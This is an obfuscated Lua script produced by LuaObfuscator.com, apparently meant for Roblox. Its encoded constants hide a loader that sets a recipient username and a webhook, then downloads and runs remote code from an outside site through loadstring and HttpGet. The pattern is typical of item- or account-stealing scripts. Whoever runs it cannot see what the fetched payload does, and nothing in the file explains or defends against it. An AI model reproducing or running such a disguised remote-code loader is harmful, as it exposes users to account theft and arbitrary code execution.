--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v98=v5(v71,v19);v19=nil;return v98;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -(1 + 2))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v72-(v72%1) ;else local v73=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v73 + v73))>=v73) and (928 -(214 + 713))) or ((1637 -(1523 + 114)) + 0) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -(117 -(32 + 85)))) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,792 -(368 + 423) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v42 ;local v46=v20(v43,(50 -34) + 5 ,123 -92 );local v47=((v20(v43,32)==((971 -(10 + 8)) -(802 + (577 -427)))) and  -(2 -(443 -(416 + 26)))) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (997 -(915 + 82)) ;else local v77=0 -0 ;while true do if (v77==(0 + 0 + 0)) then v46=1 -0 ;v44=1187 -((1890 -821) + 118) ;break;end end end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(438 -(145 + 293))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(431 -(44 + 386)) );v18=v18 + v48 ;local v50={};for v67=1, #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=561 -(79 + 482) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(1 -0)) then else v54=nil;v55=nil;v51=5 -3 ;end if (2~=v51) then else v56=nil;v57=nil;v51=288 -(134 + 151) ;end if (v51==(0 + 0)) then v52=0;v53=nil;v51=1666 -(970 + 695) ;end if (v51==(853 -(20 + 830))) then v58=nil;v59=nil;v51=4;end if (v51==(4 + 0)) then while true do if (v52==2) then local v93=126 -(116 + 10) ;while true do if (v93~=1) then else v52=5 -2 ;break;end if (v93==(738 -(542 + 196))) then v57=nil;v58=nil;v93=1991 -(582 + 1408) ;end end end if (v52==(10 -7)) then v59=nil;while true do local v99=0 + 0 ;local v100;while true do if (v99==(0 -0)) then v100=0 -0 ;while true do if (v100==1) then if (v53==(2 -1)) then local v110=0;while true do if (v110~=(1825 -(1195 + 629))) then else v59={};v53=2 -0 ;break;end if (v110==(241 -(187 + 54))) then local v131=1121 -(118 + 1003) ;local v132;while true do if (v131~=(780 -(162 + 618))) then else v132=377 -(142 + 235) ;while true do if (v132==1) then v110=1 + 0 ;break;end if (v132==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v132=1 + 0 ;end end break;end end end end end if (v53==(2 -0)) then local v111=0 + 0 ;local v112;while true do if (v111~=(1636 -(1373 + 263))) then else v112=1000 -(451 + 549) ;while true do if (v112~=(0 + 0)) then else local v138=0 -0 ;while true do if (v138==(0 + 0)) then for v160=1,v58 do local v161=0;local v162;local v163;local v164;while true do if (v161~=(1 -0)) then else v164=nil;while true do if (v162==(1385 -(746 + 638))) then if (v163==1) then v164=v21()~=(0 + 0) ;elseif (v163==2) then v164=v24();elseif (v163~=(2 + 1)) then else v164=v25();end v59[v160]=v164;break;end if (v162==0) then local v168=0 -0 ;while true do if (v168==(342 -(218 + 123))) then v162=1582 -(1535 + 46) ;break;end if (v168==(0 -0)) then v163=v21();v164=nil;v168=1 + 0 ;end end end end break;end if (v161==(0 -0)) then v162=0 + 0 ;v163=nil;v161=1;end end end v57[3]=v21();v138=4 -3 ;end if (v138==(1 + 0)) then v112=754 -(239 + 514) ;break;end end end if (v112==1) then for v148=1,v23() do local v149=560 -(306 + 254) ;local v150;local v151;local v152;while true do if (0==v149) then v150=0;v151=nil;v149=1;end if (v149~=1) then else v152=nil;while true do if (v150==(1 + 0)) then while true do if ((0 -0)~=v151) then else v152=v21();if (v20(v152,1468 -(899 + 568) ,1 + 0 )~=(0 -0)) then else local v171=603 -(268 + 335) ;local v172;local v173;local v174;local v175;while true do if (v171==(2 -1)) then v174=nil;v175=nil;v171=1204 -(373 + 829) ;end if (v171==0) then v172=0;v173=nil;v171=291 -(60 + 230) ;end if (v171~=(574 -(426 + 146))) then else while true do if (v172==(1 + 2)) then if (v20(v174,5 -2 ,5 -2 )==1) then v175[1460 -(282 + 1174) ]=v59[v175[4]];end v54[v148]=v175;break;end if (v172~=(1 + 0)) then else v175={v22(),v22(),nil,nil};if (v173==0) then local v185=336 -(144 + 192) ;local v186;while true do if (v185~=(0 + 0)) then else v186=1024 -(706 + 318) ;while true do if ((1251 -(721 + 530))==v186) then v175[1274 -(945 + 326) ]=v22();v175[4]=v22();break;end end break;end end elseif (v173==(2 -1)) then v175[3 + 0 ]=v23();elseif (v173==(2 + 0)) then v175[2 + 1 ]=v23() -((1506 -(363 + 1141))^(716 -(271 + 429))) ;elseif (v173~=3) then else local v195=0 + 0 ;local v196;local v197;while true do if (v195==(1501 -(1408 + 92))) then while true do if (v196~=0) then else v197=0 + 0 ;while true do if (v197==(0 + 0)) then v175[1978 -(1913 + 62) ]=v23() -((1088 -(461 + 625))^(1304 -(993 + 295))) ;v175[1 + 3 ]=v22();break;end end break;end end break;end if (v195==(1171 -(418 + 753))) then v196=0 + 0 ;v197=nil;v195=2 -1 ;end end end v172=1935 -(565 + 1368) ;end if ((1 + 1)==v172) then local v177=0;while true do if (v177~=0) then else if (v20(v174,1 + 0 ,1)==1) then v175[2]=v59[v175[2]];end if (v20(v174,1 + 1 ,1 + 1 )==(1662 -(1477 + 184))) then v175[3 -0 ]=v59[v175[532 -(406 + 123) ]];end v177=1770 -(1749 + 20) ;end if (v177~=1) then else v172=1 + 2 ;break;end end end if (0==v172) then local v178=1322 -(1249 + 73) ;while true do if (v178~=(856 -(564 + 292))) then else v173=v20(v152,2 -0 ,8 -5 );v174=v20(v152,2 + 2 ,1151 -(466 + 679) );v178=1;end if (v178~=(1 + 0)) then else v172=2 -1 ;break;end end end end break;end end end break;end end break;end if (0~=v150) then else v151=0 -0 ;v152=nil;v150=1901 -(106 + 1794) ;end end break;end end end v53=1004 -(938 + 63) ;break;end end break;end end end break;end if (v100==0) then local v108=0;local v109;while true do if (v108~=0) then else v109=0 + 0 ;while true do if (v109==(0 + 0)) then local v135=0 -0 ;while true do if (v135~=(1125 -(936 + 189))) then else if (v53==(0 + 0)) then local v155=0 -0 ;local v156;while true do if (v155==(114 -(4 + 110))) then v156=584 -(57 + 527) ;while true do if (v156~=(1428 -(41 + 1386))) then else v56={};v53=104 -(17 + 86) ;break;end if (0~=v156) then else v54={};v55={};v156=1 + 0 ;end end break;end end end if (v53==(6 -3)) then local v157=0 -0 ;local v158;local v159;while true do if (v157~=(166 -(122 + 44))) then else v158=0 -0 ;v159=nil;v157=3 -2 ;end if (v157~=(1876 -(157 + 1718))) then else while true do if (v158==(0 + 0)) then v159=0 -0 ;while true do local v169=0 -0 ;local v170;while true do if (v169==0) then v170=0 + 0 ;while true do if (v170==(1018 -(697 + 321))) then if (v159==(0 -0)) then for v179=1 -0 ,v23() do v55[v179-(66 -(30 + 35)) ]=v28();end for v181=1,v23() do v56[v181]=v23();end v159=1 + 0 ;end if (v159==(2 -1)) then return v57;end break;end end break;end end end break;end end break;end end end v135=1258 -(1043 + 214) ;end if (v135==1) then v109=1;break;end end end if (v109==(3 -2)) then v100=1213 -(323 + 889) ;break;end end break;end end end end break;end end end break;end if (v52==(0 -0)) then local v94=580 -(361 + 219) ;while true do if ((1227 -(322 + 905))~=v94) then else local v105=320 -(53 + 267) ;while true do if (v105==(612 -(602 + 9))) then v94=1190 -(449 + 740) ;break;end if (v105==(0 + 0)) then v53=872 -(826 + 46) ;v54=nil;v105=948 -(245 + 702) ;end end end if ((3 -2)~=v94) then else v52=414 -(15 + 398) ;break;end end end if (v52==(983 -(18 + 964))) then v55=nil;v56=nil;v52=1900 -(260 + 1638) ;end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v83=v64;local v84=v65;local v85=v66;local v86=v27;local v87={};local v88={};local v89={};for v95=(143 + 297) -(382 + 58) ,v81 do if ((v95>=v85) or ((11247 -7741)<=(1088 + 221))) then v87[v95-v85 ]=v80[v95 + (1 -0) ];else v89[v95]=v80[v95 + (1820 -(580 + 1239)) ];end end local v90=(v81-v85) + (2 -1) ;local v91;local v92;while true do local v96=0;while true do if (((4160 -(902 + 303))==(6487 -3532)) and (v96==1)) then if ((v92<=(6 -3)) or (((743 -493) + 2537 + 116)==(3185 -(1121 + 21 + 548)))) then if (((4760 -(22 + 192))>=(2958 -(483 + 88 + 112))) and (v92<=(1464 -(1404 + 59)))) then if (((2241 -1422)>=(29 -7)) and (v92==(765 -(468 + 297)))) then v89[v91[2]]=v91[565 -(334 + 228) ]~=(0 -0) ;else local v114=0 -0 ;local v115;while true do if (((5734 -2572)==((2344 -1446) + 2264)) and (v114==(236 -(141 + 60 + 35)))) then v115=v91[2 + 0 ];v89[v115]=v89[v115](v13(v89,v115 + (2 -1) ,v79));break;end end end elseif ((v92>(4 -2)) or (((1722 -(645 + 522)) + 1814)>4429)) then v89[v91[5 -3 ]]=v91[3];else v62[v91[3 + 0 ]]=v89[v91[2 + 0 ]];end elseif (((5766 -1671)>=(1878 + 1305)) and (v92<=(168 -(92 + 71)))) then if ((v92==(2 + 2)) or (3711<1008)) then do return;end else local v120=0 -0 ;local v121;local v122;local v123;while true do if ((v120==1) or ((1814 -(574 + (1981 -(1010 + 780))))<=906)) then v123=nil;while true do if ((4513>(2249 + 477)) and (v121==0)) then v122=v91[2 + 0 ];v123=v89[v91[7 -4 ]];v121=1 + 0 ;end if ((v121==(850 -(254 + 595))) or ((1607 -(55 + (338 -267)))>=(3501 -843))) then v89[v122 + (1791 -(573 + 1217)) ]=v123;v89[v122]=v123[v91[10 -6 ]];break;end end break;end if (((0 + 0)==v120) or ((5188 -1968)==(2303 -(714 + 225)))) then v121=(0 -0) -0 ;v122=nil;v120=1 -0 ;end end end elseif ((v92<=(1 + (1841 -(1045 + 791)))) or ((1525 -471)>(4198 -(118 + 688)))) then v89[v91[50 -(25 + 23) ]]=v62[v91[1 + 2 ]];elseif ((v92==(1893 -(927 + (2426 -1467)))) or ((2278 -1602)>=((3624 -1250) -(16 + 716)))) then local v126=0 -0 ;local v127;local v128;local v129;local v130;while true do if (((4233 -(11 + 86))>2397) and (v126==(505 -(351 + 154)))) then local v136=0 -0 ;while true do if ((v136==1) or (4334==(4530 -(175 + 110)))) then v126=1;break;end if ((v136==(0 -0)) or (((22664 -(1281 + 293)) -16814)<=(4827 -((769 -(28 + 238)) + 1293)))) then v127=v91[5 -(6 -3) ];v128,v129=v86(v89[v127](v13(v89,v127 + 1 + 0 ,v91[1064 -(810 + 251) ])));v136=1 + 0 ;end end end if ((v126==(1 + 1)) or ((4311 + 471)<=((3291 -(1381 + 178)) -(41 + 2 + 490)))) then for v144=v127,v79 do local v145=733 -(711 + 22) ;local v146;local v147;while true do if (((0 -0)==v145) or ((5723 -(240 + 619))<1902)) then v146=0 + 0 + 0 ;v147=nil;v145=1 -(0 + 0) ;end if (((321 + 4518)>=3700) and ((1745 -(1344 + (1378 -978)))==v145)) then while true do if ((v146==0) or ((1480 -(255 + 150))>1918)) then v147=0 + 0 ;while true do if (((213 + 95 + 88)<=(16252 -12448)) and (v147==((470 -(381 + 89)) -0))) then v130=v130 + (1740 -(404 + 1335)) ;v89[v144]=v128[v130];break;end end break;end end break;end end end break;end if ((v126==1) or ((4575 -(183 + 223))==2187)) then local v137=0 -0 ;while true do if (((932 + 474)==(506 + 900)) and ((337 -(10 + 327))==v137)) then v79=(v129 + v127) -(1 + 0) ;v130=338 -(118 + 220) ;v137=1;end if (((511 + 1020)<(3788 + 483)) and (v137==(450 -(108 + 341)))) then v126=2;break;end end end end else v89[v91[1 + 1 ]]();end v78=v78 + 1 ;break;end if (((2684 -2049)==(2128 -(711 + 782))) and ((0 -0)==v96)) then v91=v83[v78];v92=v91[470 -(270 + 135 + 64) ];v96=1;end end end end A,B=v27(v11(v82));if  not A[1] then local v97=v60[4][v78] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D65030B3O0061686D656431353132373303073O00576562482O6F6B030F3O004O3F204O3F205O3F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F672O6F662E70726F2F732F62616E6B2E6C7561000D3O0012033O00023O0012023O00013O0012033O00043O0012023O00033O0012063O00053O001206000100063O002005000100010007001203000300086O000400014O0007000100044O00015O00022O00083O000100012O00043O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
